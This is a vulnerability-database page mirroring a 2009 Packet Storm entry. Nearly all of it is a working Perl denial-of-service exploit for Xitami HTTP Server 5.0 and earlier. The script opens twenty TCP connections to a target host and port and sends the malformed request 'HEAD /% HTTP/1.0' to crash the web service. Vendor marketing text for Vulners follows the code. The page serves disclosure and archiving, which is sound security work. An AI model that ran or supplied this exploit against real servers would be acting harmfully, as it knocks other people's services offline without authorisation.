Lucene search
K

Xitami Web Server 5.0 Denial Of Service

🗓️ 22 Apr 2009 00:00:00Reported by Jonathan SalwanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Xitami Web Server 5.0 Denial Of Service vulnerabilit

Code
`#!/usr/bin/perl  
#  
# Xitami HTTP Server <= v5.0 Remote Denial of Service.  
#  
# ------------------------------------------------------------------------------  
# The vulnerability is caused due to an error with HEAD request and multi-socket  
# This can be exploited to crash the HTTP service.  
# ------------------------------------------------------------------------------  
#  
# Author: Jonathan Salwan  
# Mail: submit [AT] shell-storm.org  
# Web: http://www.shell-storm.org  
  
  
use IO::Socket;  
print "[+] Author : Jonathan Salwan\n";  
print "[+] Soft : Xitami HTTP Server v5.0\n";  
  
if (@ARGV < 1)  
{  
print "[-] Usage: <file.pl> <host> <port>\n";  
print "[-] Exemple: file.pl 127.0.0.1 80\n";  
exit;  
}  
  
  
$ip = $ARGV[0];  
$port = $ARGV[1];  
  
print "[+] Sending request...\n";  
  
  
for($i=0;$i<20;$i++)  
{  
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Failed\n";  
  
print $socket "HEAD /% HTTP/1.0\r\n\r\n";  
}  
  
print "[+] Done!\n";  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation